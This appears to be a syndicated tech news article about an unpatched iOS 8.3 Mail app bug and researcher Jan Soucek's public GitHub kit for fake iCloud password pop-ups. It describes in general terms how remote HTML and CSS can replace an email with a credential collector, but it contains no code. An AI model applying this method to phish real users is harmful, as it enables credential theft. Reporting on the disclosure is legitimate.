Users of iOS, beware. An unfixed vulnerability has been found in the Mail app, which allows hackers to steal passwords by sending an email.

The flaw was first noticed by Ernst and Young forensic bod Jan Soucek. He has created a tool capable of generating slick iCloud password phishing emails he says exploits an unpatched bug.

He has even recorded a proof-of-concept video.

He made an iOS 8.3 Mail.app inject kit. It exploits a bug in the native email app and can produce a realistic pop-up. Soucek explained that he first told Apple about the bug in January, but that the company had not responded or fixed the problem.

Now he has opted for a more extreme approach. The complete kit is available on Github.

"Back in January 2015 I stumbled upon a bug in iOS' mail client, resulting in HTML tags in email messages not being ignored", Soucek said.

"This bug allows remote HTML content to be loaded, replacing the content of the original email message. JavaScript is disabled in this UIWebView, but it is still possible to build a functional password 'collector' using simple HTML and CSS", Soucek added.

"It was filed under Radar #19479280 back in January, but the fix was not delivered in any of the iOS updates following 8.1.2", Soucek explains.

Hackers can now use the free tools to customize them and attack whichever iOS credentials they wanted. Unsuspecting Apple users would only get a security pop-up no different from the regular iCloud identification process.

Apple is yet to comment on the issue.

Published under license from ITProPortal.com, a Net Communities Ltd Publication. All rights reserved.

Photo Credit: D. Hammonds/Shutterstock